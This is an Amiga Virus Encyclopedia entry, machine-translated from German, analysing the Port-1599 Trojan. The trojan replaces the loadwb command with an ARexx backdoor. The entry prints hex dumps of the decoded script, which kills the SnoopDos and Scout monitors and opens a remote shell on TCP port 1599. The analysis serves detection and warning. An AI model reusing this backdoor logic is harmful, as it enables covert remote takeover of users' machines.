------------------------
     Amiga Virus Encyclopedia
     Port 1599 Trojan
     ------------------------


     Virus Help Team are looking for this virus, please send it to us

        Port-1599 Trojan (computer takeover)
        An ARexx program
        The coding routine corresponds to the Port-67 Trojan routine down to the byte.
        Several files are required
        VT offers to delete. Please copy the original Loadwb command again.


        IMPORTANT !!! IMPORTANT !!!!
        The installer file and/or archive is UNKNOWN. Please
        search with ???
        c:loadwb (incorrect) packed:  1192 bytes
                             unpacked: 748 bytes
        l:startup.handler (real loadwb) 1136 bytes
        l:background.handler 1700 bytes
        My opinion: NO program WITHOUT ulterior motives
        moves a program from c: to l: and takes on its name. Unpacked in loadwb (incorrectly) you can read:
        
        ffdc7000 4e5d4e75 52554e20 3e4e494c ..p.N]NuRUN >NIL
        3a204c3a 6261636b 67726f75 6e642e68 : L:background.h
        616e646c 6572004c 3a737461 72747570 andler.L:startup
        2e68616e c6572 00726578 786d6173 .handler.rexxmas
        74004e49 4c3a0000 74ff4e75 4e750000 t.NIL:..t.NuNu..

        In reality, three programs are started with DOS-Execute.
        The background file reads uncoded:
        01014e75 24564552 3a204247 48616e64 ..Nu$VER: BGHand
        6c657220 322e3120 2831392e 392e3934 ler 2.1 (19.9.94
        29204368 696c6474 616b206d 616e6167 ) Childtak manag
        656d656e 7420686e 64720a00 ement hndr..
        background.handler contains a multi-coded area.

        Created in memory:
        00000043 54455354 313a3b61 64647265 ...CTEST1:;addre
        73732063 6f6d6d61 6e642027 57616974 ss command 'Wait
        20313020 6d696e27 3b3b6966 2073686f 10 min';;if sho
        77282770 272c274d 49414d49 2e312729 w('p','MIAMI.1')
        20746865 6e207369 676e616c 20534e4f then signal SNO
        4f505445 53543b65 6c736520 7369676e OPTEST;else sign
        616c2054 45535432 3b544553 54323a3b al TEST2;TEST2:;
        3b696620 73686f77 28277027 2c27414d ;if show('p','AM
        49544350 27292074 68656e20 7369676e ITCP') then sign
        616c2053 4e4f4f50 54455354 3b656c73 al SNOOPTEST;els
        65207369 676e616c 20544553 54313b53 e signal TEST1;S
        4e4f4f50 54455354 3a3b6966 2073686f NOOPTEST:;if sho
        77282770 272c2753 4e4f4f50 444f5327 w('p','SNOOPDOS'
        29205448 454e2044 4f3b6164 64726573 ) THEN DO;addres
        7320736e 6f6f7064 6f732071 7569743b s snoopdos quit;
        454e443b 7369676e 616c2053 434f5554 END;signal SCOUT
        54455354 3b53434f 55545445 53543a3b TEST;SCOUTTEST:;
        69662073 686f7728 2770272c 2753434f if show('p','SCO
        55542e31 27292054 48454e20 444f3b61 UT.1') THEN DO;a
        64647265 73732073 636f7574 2e312051 ddress scout.1 Q
        5549543b 454e443b 7369676e 616c2050 UIT;END;signal P
        4f52543b 504f5254 3a3b6164 64726573 PLACE;PORT:;addres
        7320636f 6d6d616e 64202752 756e203c s command 'Run <
        3e4e494c 3a204e65 77736865 6c6c2054 >NIL: Newshell T
        43503a31 35393927 3b736967 6e616c20 CP:1599';signal
        54455354 313b6578 69740000 TEST1;exit..
    
        An ARexx program, a time loop, test on Snoopdos
        and Scout, newshell.
        According to third-party statements:
        There are supposed to have been unauthorized accesses (spying on passwords,
        formatting partition).
        
        Addendum 98-03-05:
        I have received several emails. The 1599 port seems to have been known to
        "insiders" for some time. The corresponding
        Amiga programs are now said to allow defensive entries.
        see also Port-67 Trojan


     Original test by Heiner Schneegold
     Translated from german to english by Google translate
     
     Virus Help Team are looking for this virus, please send it to us